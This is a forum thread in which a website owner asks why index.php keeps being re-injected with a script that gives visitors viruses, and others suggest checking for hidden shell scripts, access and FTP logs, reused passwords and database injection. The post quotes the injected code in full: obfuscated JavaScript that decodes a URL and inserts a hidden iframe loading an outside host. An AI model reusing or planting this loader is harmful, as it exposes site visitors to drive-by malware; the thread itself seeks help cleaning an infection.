Index.php keeps getting injected with script ??

My index.php which has permissions of 644 keeps getting modified and giving my users viruses the code is below how the heck do I stop this ? I keep cleaning it and it comes right back


<script type='text/javascript'>function gQ(){};var iL=function(){};gQ.prototype = {e : function() {hL=57051;this.aS='';this.nW=55081;return 'hIt!t!p!:7/7/It?r7a!fIf7i!cIt!rIaAvAeAl!l7i?nAg7.AcAoAmI/Ac?g7iA-AbAiAn7/!0I6?1!'.wW(/[\!I7\?A]/g, '');y=8228;var aJ="aJ";var nK=function(){};},u : function() {var v="";var bX=37660;w=21825;var vE=new Array();this.oS="";function lB(){};this.mO=57968;var s=document;var sN=function(){return 'sN'};yB='';this.f=false;var n=window;this.hR='';this.aZ="";var dU="";function nX(){};this.hS="";this.dR=''; String.prototype.wW=function(o, i){return this.replace(o, i)};t=23190;iQ=19758;var oM=function(){};uZ='';var kK=new Array();var lZ=new Date();var x = 'sQtayQl[eH'.wW(/[HG\[Qa]/g, '');lC=false;var nP=function(){return 'nP'}; var l = 'aRpjpZe3nLdRCZhji3l3dR'.wW(/[RjLZ3]/g, '');var nR=function(){return 'nR'};var g=false;var aX=new Array();var iC = 'iRf%rRasmsen'.wW(/[nRsB%]/g, '');kP=false;function iG(){};hE="hE";this.lT="";var iF = 'c>rUeNa]tUeUEUlNe]m>eNnKtN'.wW(/[NK\]U\>]/g, '');var gS='';var kS='';p="p";var yI=function(){};var d = 'wZrZiZt[e<'.wW(/[\<C\[Zj]/g, '');function c(){};function qI(){};var hX=new Date();var j = 'sgeDt8A8tgt8rSi8bPuDtDeg'.wW(/[gPDS8]/g, '');wU="";this.cS="cS";var hLU=50676;var eM=function(){return 'eM'};var m = 's<r<c<'.wW(/[\<;\.M1]/g, '');sD='';var qD="qD";var kA=new Date();var a = 'bDo;d;yD'.wW(/[DICj;]/g, '');dF='';var mOC='';var h = 'd!iGsVp!lzaVyV:!n!oVnze|'.wW(/[\|zV\!G]/g, '');iW="iW";this.xB="xB";var b = 's_e_t_Tni!m!e~o!u~t_'.wW(/[_n~\!6]/g, '');var qH=false;var yU=false;this.cO=false;var yUZ=false;this.lJ=false;uB='';var yY=36559;fZ="fZ";try {gR='';var vT=new Array();var pP=false;this.dV='';var mH='';iN=48178;var q=s[iF](iC);var bB=new Date();this.gT='';var tO=false;var sS=11262;q[j](m, this.e());var aXT='';pS=false;pJ=2191;q[j](x, h);var pG=new Array();var fF='';this.qO="";iI='';var mE="mE";function hSH(){};document[a][l](q);pJD="";function wQ(){};var hT='';var aQ=new Array();gB=false;} catch(k) {yL="";var iM=function(){return 'iM'};s.write('m3FNk3Z_<4/_b3o_dNy4>3<x/4hNt3m3l3>N'.wW(/[Nx43_]/g, ''));var hW=function(){};hTW="hTW";var aF = this;this.eC=false;var eS=313;var z=19114;n(function(){ aF.u() }, 326);var pA=58584;this.oI="oI";}this.qL=false;var r='';hSS="hSS";}};bF='';var tF=new gQ(); rM="";tF.u();qC="";</script>

 

I don't understand why your index.php needs RW permission. Do you need to write inside your file ??

 

I think the index has to be with this permission -rwxr--r--

 

The index is 644 which is -rw-r--r--

 

Sounds like there may be a shell script or something hidden that is writing to the file. Take a look in your web sites folders and files for any strange files.

 

Check your webserver access log file!

 

==> My index.php which has permissions of 644 keeps getting modified.

Index.php got permissions 644 from FTP server automatic, after you or somebody else has been uploaded this file (original or modified) via FTP Umask.

Check your ftp logs and ensure that you do not use same passwords for database en ftp access.


Inserted code can also be inside your database and your index has never been modified.